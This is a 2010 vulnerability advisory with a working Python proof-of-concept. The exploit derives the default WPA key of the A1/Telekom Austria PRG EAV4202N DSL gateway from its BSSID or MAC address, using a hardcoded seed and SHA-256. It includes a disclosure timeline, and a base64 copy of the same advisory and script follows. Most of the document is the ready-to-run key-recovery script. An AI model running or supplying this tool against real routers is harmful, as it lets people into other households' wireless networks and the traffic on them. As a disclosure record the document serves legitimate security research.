'''
title:          A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness
product names:  PRG EAV4202N, PRGAV4202N, PRG 4202 N, P.RG AV4202N
device class:   802.11n DSL broadband gateway
vulnerable:     S/N PI101120401*
not vulnerable: S/N PI105220402* (?)
impact:         critical
 
product notes:
This device is manufactured by ADB Broadband (formerly Pirelli Broadband) and is rebranded for
A1 (formerly Telekom Austria). A Wi-Fi AP is enabled by default and can be accessed with the
default WPA-key printed on the back of the device.
 
vulnerability description:
The algorithm for the default WPA-key is entirely based on the internal MAC address (rg_mac).
rg_mac can either be derived from BSSID and SSID (if not changed) or BSSID alone.
 
timeline:
2010-11-20 working exploit
2010-12-04 informed Telekom Austria
2010-12-06 TA requests exploit code
2010-12-07 PoC sent
2010-12-09 TA starts analysis with ADB Broadband
2010-12-17 analysis finished
2010-12-20 vulnerability confirmed, will be fixed in next hardware(!) revision
...
2011-03-10 TA discloses vulnerability to press
2011-03-10 TA confirms that they will not inform affected customers directly
2011-12-04 grace period over
 
references:
http://b...content-available-to-author-only...l.com/medias/images/products/prg_av4202n/data_sheet_p_rg_av4202n.pdf
http://f...content-available-to-author-only...e.at/produkte/2165-massives-sicherheitsproblem-bei-telekom-modems.php
http://h...content-available-to-author-only...f.at/stories/1678161/
'''
 
import sys, re, hashlib
 
def gen_key(mac):
    seed = ('\x54\x45\x4F\x74\x65\x6C\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' + 
            '\xCA\xAF\x12\x84\x02\xAC\x56\x00\x05\xCE\x20\x75\x94\x3F\xDC\xE8')
    lookup = '0123456789ABCDEFGHIKJLMNOPQRSTUVWXYZabcdefghikjlmnopqrstuvwxyz'
 
    h = hashlib.sha256()
    h.update(seed)
    h.update(mac)
    digest = bytearray(h.digest())
    return ''.join([lookup[x % len(lookup)] for x in digest[0:12]])
 
def main():
    print '*********************************************************************'
    print ' A1/Telekom Austria PRG EAV4202N Default WPA Key Algorithm Weakness'
    print '                 Stefan Viehboeck <@sviehb> 11.2010'
    print '*********************************************************************'
 
    if len(sys.argv) != 2:
        sys.exit('usage: pirelli_wpa.py [RG_MAC] or [BSSID]\n eg. pirelli_wpa.py 38229D112233\n')
 
    mac_str = re.sub(r'[^a-fA-F0-9]', '', sys.argv[1])
    if len(mac_str) != 12:
        sys.exit('check MAC format!\n')
 
    mac = bytearray.fromhex(mac_str)
    print 'based on rg_mac:\nSSID: PBS-%02X%02X%02X' % (mac[3], mac[4], mac[5])
    print 'WPA key: %s\n' % (gen_key(mac))
 
    mac[5] -= 5
    print 'based on BSSID:\nSSID: PBS-%02X%02X%02X' % (mac[3], mac[4], mac[5])
    print 'WPA key: %s\n' % (gen_key(mac))
 
if __name__ == "__main__":
    main()

JycnCnRpdGxlOiAgICAgICAgICBBMS9UZWxla29tIEF1c3RyaWEgUFJHIEVBVjQyMDJOIERlZmF1bHQgV1BBIEtleSBBbGdvcml0aG0gV2Vha25lc3MKcHJvZHVjdCBuYW1lczogIFBSRyBFQVY0MjAyTiwgUFJHQVY0MjAyTiwgUFJHIDQyMDIgTiwgUC5SRyBBVjQyMDJOCmRldmljZSBjbGFzczogICA4MDIuMTFuIERTTCBicm9hZGJhbmQgZ2F0ZXdheQp2dWxuZXJhYmxlOiAgICAgUy9OIFBJMTAxMTIwNDAxKgpub3QgdnVsbmVyYWJsZTogUy9OIFBJMTA1MjIwNDAyKiAoPykKaW1wYWN0OiAgICAgICAgIGNyaXRpY2FsCgpwcm9kdWN0IG5vdGVzOgpUaGlzIGRldmljZSBpcyBtYW51ZmFjdHVyZWQgYnkgQURCIEJyb2FkYmFuZCAoZm9ybWVybHkgUGlyZWxsaSBCcm9hZGJhbmQpIGFuZCBpcyByZWJyYW5kZWQgZm9yCkExIChmb3JtZXJseSBUZWxla29tIEF1c3RyaWEpLiBBIFdpLUZpIEFQIGlzIGVuYWJsZWQgYnkgZGVmYXVsdCBhbmQgY2FuIGJlIGFjY2Vzc2VkIHdpdGggdGhlCmRlZmF1bHQgV1BBLWtleSBwcmludGVkIG9uIHRoZSBiYWNrIG9mIHRoZSBkZXZpY2UuCgp2dWxuZXJhYmlsaXR5IGRlc2NyaXB0aW9uOgpUaGUgYWxnb3JpdGhtIGZvciB0aGUgZGVmYXVsdCBXUEEta2V5IGlzIGVudGlyZWx5IGJhc2VkIG9uIHRoZSBpbnRlcm5hbCBNQUMgYWRkcmVzcyAocmdfbWFjKS4KcmdfbWFjIGNhbiBlaXRoZXIgYmUgZGVyaXZlZCBmcm9tIEJTU0lEIGFuZCBTU0lEIChpZiBub3QgY2hhbmdlZCkgb3IgQlNTSUQgYWxvbmUuCgp0aW1lbGluZToKMjAxMC0xMS0yMCB3b3JraW5nIGV4cGxvaXQKMjAxMC0xMi0wNCBpbmZvcm1lZCBUZWxla29tIEF1c3RyaWEKMjAxMC0xMi0wNiBUQSByZXF1ZXN0cyBleHBsb2l0IGNvZGUKMjAxMC0xMi0wNyBQb0Mgc2VudAoyMDEwLTEyLTA5IFRBIHN0YXJ0cyBhbmFseXNpcyB3aXRoIEFEQiBCcm9hZGJhbmQKMjAxMC0xMi0xNyBhbmFseXNpcyBmaW5pc2hlZAoyMDEwLTEyLTIwIHZ1bG5lcmFiaWxpdHkgY29uZmlybWVkLCB3aWxsIGJlIGZpeGVkIGluIG5leHQgaGFyZHdhcmUoISkgcmV2aXNpb24KLi4uCjIwMTEtMDMtMTAgVEEgZGlzY2xvc2VzIHZ1bG5lcmFiaWxpdHkgdG8gcHJlc3MKMjAxMS0wMy0xMCBUQSBjb25maXJtcyB0aGF0IHRoZXkgd2lsbCBub3QgaW5mb3JtIGFmZmVjdGVkIGN1c3RvbWVycyBkaXJlY3RseQoyMDExLTEyLTA0IGdyYWNlIHBlcmlvZCBvdmVyCgpyZWZlcmVuY2VzOgpodHRwOi8vYi4uLmNvbnRlbnQtYXZhaWxhYmxlLXRvLWF1dGhvci1vbmx5Li4ubC5jb20vbWVkaWFzL2ltYWdlcy9wcm9kdWN0cy9wcmdfYXY0MjAybi9kYXRhX3NoZWV0X3BfcmdfYXY0MjAybi5wZGYKaHR0cDovL2YuLi5jb250ZW50LWF2YWlsYWJsZS10by1hdXRob3Itb25seS4uLmUuYXQvcHJvZHVrdGUvMjE2NS1tYXNzaXZlcy1zaWNoZXJoZWl0c3Byb2JsZW0tYmVpLXRlbGVrb20tbW9kZW1zLnBocApodHRwOi8vaC4uLmNvbnRlbnQtYXZhaWxhYmxlLXRvLWF1dGhvci1vbmx5Li4uZi5hdC9zdG9yaWVzLzE2NzgxNjEvCicnJwoKaW1wb3J0IHN5cywgcmUsIGhhc2hsaWIKCmRlZiBnZW5fa2V5KG1hYyk6CiAgICBzZWVkID0gKCdceDU0XHg0NVx4NEZceDc0XHg2NVx4NkNceEI2XHhEOVx4ODZceDk2XHg4RFx4MzRceDQ1XHhEMlx4M0JceDE1JyArIAogICAgICAgICAgICAnXHhDQVx4QUZceDEyXHg4NFx4MDJceEFDXHg1Nlx4MDBceDA1XHhDRVx4MjBceDc1XHg5NFx4M0ZceERDXHhFOCcpCiAgICBsb29rdXAgPSAnMDEyMzQ1Njc4OUFCQ0RFRkdISUtKTE1OT1BRUlNUVVZXWFlaYWJjZGVmZ2hpa2psbW5vcHFyc3R1dnd4eXonCgogICAgaCA9IGhhc2hsaWIuc2hhMjU2KCkKICAgIGgudXBkYXRlKHNlZWQpCiAgICBoLnVwZGF0ZShtYWMpCiAgICBkaWdlc3QgPSBieXRlYXJyYXkoaC5kaWdlc3QoKSkKICAgIHJldHVybiAnJy5qb2luKFtsb29rdXBbeCAlIGxlbihsb29rdXApXSBmb3IgeCBpbiBkaWdlc3RbMDoxMl1dKQoKZGVmIG1haW4oKToKICAgIHByaW50ICcqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKionCiAgICBwcmludCAnIEExL1RlbGVrb20gQXVzdHJpYSBQUkcgRUFWNDIwMk4gRGVmYXVsdCBXUEEgS2V5IEFsZ29yaXRobSBXZWFrbmVzcycKICAgIHByaW50ICcgICAgICAgICAgICAgICAgIFN0ZWZhbiBWaWVoYm9lY2sgPEBzdmllaGI+IDExLjIwMTAnCiAgICBwcmludCAnKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqJwoKICAgIGlmIGxlbihzeXMuYXJndikgIT0gMjoKICAgICAgICBzeXMuZXhpdCgndXNhZ2U6IHBpcmVsbGlfd3BhLnB5IFtSR19NQUNdIG9yIFtCU1NJRF1cbiBlZy4gcGlyZWxsaV93cGEucHkgMzgyMjlEMTEyMjMzXG4nKQogICAgICAgIAogICAgbWFjX3N0ciA9IHJlLnN1YihyJ1teYS1mQS1GMC05XScsICcnLCBzeXMuYXJndlsxXSkKICAgIGlmIGxlbihtYWNfc3RyKSAhPSAxMjoKICAgICAgICBzeXMuZXhpdCgnY2hlY2sgTUFDIGZvcm1hdCFcbicpCgogICAgbWFjID0gYnl0ZWFycmF5LmZyb21oZXgobWFjX3N0cikKICAgIHByaW50ICdiYXNlZCBvbiByZ19tYWM6XG5TU0lEOiBQQlMtJTAyWCUwMlglMDJYJyAlIChtYWNbM10sIG1hY1s0XSwgbWFjWzVdKQogICAgcHJpbnQgJ1dQQSBrZXk6ICVzXG4nICUgKGdlbl9rZXkobWFjKSkKICAgIAogICAgbWFjWzVdIC09IDUKICAgIHByaW50ICdiYXNlZCBvbiBCU1NJRDpcblNTSUQ6IFBCUy0lMDJYJTAyWCUwMlgnICUgKG1hY1szXSwgbWFjWzRdLCBtYWNbNV0pCiAgICBwcmludCAnV1BBIGtleTogJXNcbicgJSAoZ2VuX2tleShtYWMpKQoKaWYgX19uYW1lX18gPT0gIl9fbWFpbl9fIjoKICAgIG1haW4oKQ==